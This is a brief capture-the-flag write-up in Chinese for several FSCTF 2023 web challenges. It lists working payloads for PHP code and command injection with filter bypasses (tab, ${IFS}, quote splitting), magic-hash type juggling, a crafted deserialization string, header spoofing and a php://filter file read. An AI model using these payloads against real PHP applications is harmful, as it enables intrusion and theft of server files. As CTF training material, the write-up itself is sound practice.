[FSCTF 2023]EZ_eval
查看源码
使用长标签,
payload:word=<script%09language="php">system('ta\c%09/f*');</s
[FSCTF 2023]webshell是啥捏
payload:👽=cat /f*
$😭=prssthru
[FSCTF 2023]细狗2.0
payload:;"ca"t${IFS}/f*
[FSCTF 2023]ez_php1
1,a=QNKCDZO&b=240610708
2,FL_AG=00
得到,L0vey0U.php
3,str=s:10:"YES I love";
得到,P0int.php
payload:data=O:5:"Clazz":2:{s:1:"a";N;s:1:"b";R:2;}
得到,PD8NCiRGTEFHPSAiRkxBR3t5MHVfYXJlX2wwdmUhISEhfSINCj8+DQo=
base64解密,FLAG{y0u_are_l0ve!!!!}
[FSCTF 2023]巴巴托斯!
进入,将UA改为FSCTF Browser,然后发现local man,改XFF,再改Referer.
然后发现可能是日志文件注入,但日志打不开,所以使用Php伪协议。
php://filter/read=convert.base64-encode/resource=flag.php
得到base64编码。